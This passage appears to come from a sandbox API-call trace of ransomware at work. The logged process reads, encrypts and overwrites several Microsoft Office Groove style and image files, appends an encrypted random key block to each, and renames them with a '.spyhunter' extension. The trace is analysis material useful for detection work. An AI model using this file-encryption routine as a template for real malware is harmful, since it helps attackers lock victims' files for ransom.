[0109.150] GetProcessHeap () returned 0x2c0000 [0109.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.150] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f7c4*=0x314, lpOverlapped=0x0) returned 1 [0109.218] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffcec, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.218] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x314, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f7c4*=0x314, lpOverlapped=0x0) returned 1 [0109.218] GetProcessHeap () returned 0x2c0000 [0109.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.219] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.219] WriteFile (in: hFile=0xb4, lpBuffer=0x270f804*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x270f804*, lpNumberOfBytesWritten=0x270f7c4*=0x4, lpOverlapped=0x0) returned 1 [0109.219] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7c4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7c4*=0x30, lpOverlapped=0x0) returned 1 [0109.219] CloseHandle (hObject=0xb4) returned 1 [0109.219] GetProcessHeap () returned 0x2c0000 [0109.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.219] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css.spyhunter") returned 119 [0109.219] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagestyle.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageStyle.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagestyle.css.spyhunter")) returned 1 [0109.220] GetProcessHeap () returned 0x2c0000 [0109.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.220] GetProcessHeap () returned 0x2c0000 [0109.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.220] GetProcessHeap () returned 0x2c0000 [0109.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e214f8 | out: hHeap=0x2c0000) returned 1 [0109.220] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f800 | out: pbBuffer=0x270f800) returned 1 [0109.220] GetProcessHeap () returned 0x2c0000 [0109.220] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.220] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7f8*=0x30) returned 1 [0109.220] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lightspirit.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.238] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css") returned 114 [0109.238] StrStrW (lpFirst="LightSpirit.css", lpSrch=".txt") returned 0x0 [0109.238] GetProcessHeap () returned 0x2c0000 [0109.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.238] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f7bc*=0x7cf, lpOverlapped=0x0) returned 1 [0109.272] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff831, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.272] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x7cf, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f7bc*=0x7cf, lpOverlapped=0x0) returned 1 [0109.272] GetProcessHeap () returned 0x2c0000 [0109.272] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.273] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.273] WriteFile (in: hFile=0x154, lpBuffer=0x270f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x270f7fc*, lpNumberOfBytesWritten=0x270f7bc*=0x4, lpOverlapped=0x0) returned 1 [0109.273] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7bc*=0x30, lpOverlapped=0x0) returned 1 [0109.279] CloseHandle (hObject=0x154) returned 1 [0109.279] GetProcessHeap () returned 0x2c0000 [0109.279] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.279] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css.spyhunter") returned 124 [0109.280] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lightspirit.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\LightSpirit.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\lightspirit.css.spyhunter")) returned 1 [0109.676] GetProcessHeap () returned 0x2c0000 [0109.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.676] GetProcessHeap () returned 0x2c0000 [0109.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.676] GetProcessHeap () returned 0x2c0000 [0109.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b358 | out: hHeap=0x2c0000) returned 1 [0109.676] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f800 | out: pbBuffer=0x270f800) returned 1 [0109.676] GetProcessHeap () returned 0x2c0000 [0109.676] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.676] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7f8*=0x30) returned 1 [0109.676] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.677] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css") returned 106 [0109.677] StrStrW (lpFirst="Sts.css", lpSrch=".txt") returned 0x0 [0109.677] GetProcessHeap () returned 0x2c0000 [0109.677] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.677] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7bc*=0xadd, lpOverlapped=0x0) returned 1 [0109.689] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffff523, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.690] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xadd, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7bc*=0xadd, lpOverlapped=0x0) returned 1 [0109.690] GetProcessHeap () returned 0x2c0000 [0109.690] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.690] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.690] WriteFile (in: hFile=0x154, lpBuffer=0x270f7fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x270f7fc*, lpNumberOfBytesWritten=0x270f7bc*=0x4, lpOverlapped=0x0) returned 1 [0109.690] WriteFile (in: hFile=0x154, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7bc, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7bc*=0x30, lpOverlapped=0x0) returned 1 [0109.690] CloseHandle (hObject=0x154) returned 1 [0109.694] GetProcessHeap () returned 0x2c0000 [0109.694] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e44a30 [0109.695] wnsprintfW (in: pszDest=0x2e44a30, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css.spyhunter") returned 116 [0109.695] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Sts.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\sts.css.spyhunter")) returned 1 [0109.696] GetProcessHeap () returned 0x2c0000 [0109.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44a30 | out: hHeap=0x2c0000) returned 1 [0109.696] GetProcessHeap () returned 0x2c0000 [0109.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.696] GetProcessHeap () returned 0x2c0000 [0109.696] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21e38 | out: hHeap=0x2c0000) returned 1 [0109.696] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7f8 | out: pbBuffer=0x270f7f8) returned 1 [0109.696] GetProcessHeap () returned 0x2c0000 [0109.696] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.696] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7f0*=0x30) returned 1 [0109.696] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_on.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.698] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF") returned 121 [0109.698] StrStrW (lpFirst="TAB_ON.GIF", lpSrch=".txt") returned 0x0 [0109.698] GetProcessHeap () returned 0x2c0000 [0109.698] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.698] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7b4*=0xde, lpOverlapped=0x0) returned 1 [0109.699] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.699] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7b4*=0xde, lpOverlapped=0x0) returned 1 [0109.699] GetProcessHeap () returned 0x2c0000 [0109.699] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.699] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.699] WriteFile (in: hFile=0xb4, lpBuffer=0x270f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x270f7f4*, lpNumberOfBytesWritten=0x270f7b4*=0x4, lpOverlapped=0x0) returned 1 [0109.700] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7b4*=0x30, lpOverlapped=0x0) returned 1 [0109.700] CloseHandle (hObject=0xb4) returned 1 [0109.700] GetProcessHeap () returned 0x2c0000 [0109.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.700] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF.spyhunter") returned 131 [0109.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_on.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_ON.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_on.gif.spyhunter")) returned 1 [0109.705] GetProcessHeap () returned 0x2c0000 [0109.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.705] GetProcessHeap () returned 0x2c0000 [0109.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.705] GetProcessHeap () returned 0x2c0000 [0109.705] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34390 | out: hHeap=0x2c0000) returned 1 [0109.705] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7f8 | out: pbBuffer=0x270f7f8) returned 1 [0109.705] GetProcessHeap () returned 0x2c0000 [0109.705] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.705] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7f0*=0x30) returned 1 [0109.705] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\button.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.706] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF") returned 121 [0109.706] StrStrW (lpFirst="BUTTON.GIF", lpSrch=".txt") returned 0x0 [0109.706] GetProcessHeap () returned 0x2c0000 [0109.706] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.706] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7b4*=0x1ac, lpOverlapped=0x0) returned 1 [0109.707] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffe54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.707] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1ac, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7b4*=0x1ac, lpOverlapped=0x0) returned 1 [0109.707] GetProcessHeap () returned 0x2c0000 [0109.707] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.707] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.707] WriteFile (in: hFile=0xb4, lpBuffer=0x270f7f4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x270f7f4*, lpNumberOfBytesWritten=0x270f7b4*=0x4, lpOverlapped=0x0) returned 1 [0109.707] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7b4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7b4*=0x30, lpOverlapped=0x0) returned 1 [0109.708] CloseHandle (hObject=0xb4) returned 1 [0109.708] GetProcessHeap () returned 0x2c0000 [0109.708] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.708] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF.spyhunter") returned 131 [0109.708] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\button.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\BUTTON.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\button.gif.spyhunter")) returned 1 [0109.709] GetProcessHeap () returned 0x2c0000 [0109.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.709] GetProcessHeap () returned 0x2c0000 [0109.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.709] GetProcessHeap () returned 0x2c0000 [0109.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34100 | out: hHeap=0x2c0000) returned 1 [0109.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7f0 | out: pbBuffer=0x270f7f0) returned 1 [0109.709] GetProcessHeap () returned 0x2c0000 [0109.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7e8*=0x30) returned 1 [0109.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\background.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.709] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif") returned 122 [0109.709] StrStrW (lpFirst="background.gif", lpSrch=".txt") returned 0x0 [0109.710] GetProcessHeap () returned 0x2c0000 [0109.710] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.710] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f7ac*=0x1afa, lpOverlapped=0x0) returned 1 [0109.727] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffe506, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.727] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1afa, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f7ac*=0x1afa, lpOverlapped=0x0) returned 1 [0109.727] GetProcessHeap () returned 0x2c0000 [0109.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.728] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.728] WriteFile (in: hFile=0xb4, lpBuffer=0x270f7ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x270f7ec*, lpNumberOfBytesWritten=0x270f7ac*=0x4, lpOverlapped=0x0) returned 1 [0109.728] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f7ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f7ac*=0x30, lpOverlapped=0x0) returned 1 [0109.728] CloseHandle (hObject=0xb4) returned 1 [0109.732] GetProcessHeap () returned 0x2c0000 [0109.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0109.733] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif.spyhunter") returned 132 [0109.733] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\background.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue\\background.gif.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue\\background.gif.spyhunter")) returned 1 [0109.734] GetProcessHeap () returned 0x2c0000 [0109.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0109.734] GetProcessHeap () returned 0x2c0000 [0109.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0109.734] GetProcessHeap () returned 0x2c0000 [0109.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e33fb8 | out: hHeap=0x2c0000) returned 1 [0109.734] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7f0 | out: pbBuffer=0x270f7f0) returned 1 [0109.734] GetProcessHeap () returned 0x2c0000 [0109.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0109.734] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7e8*=0x30) returned 1 [0109.734] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\OliveGreen.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\olivegreen.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 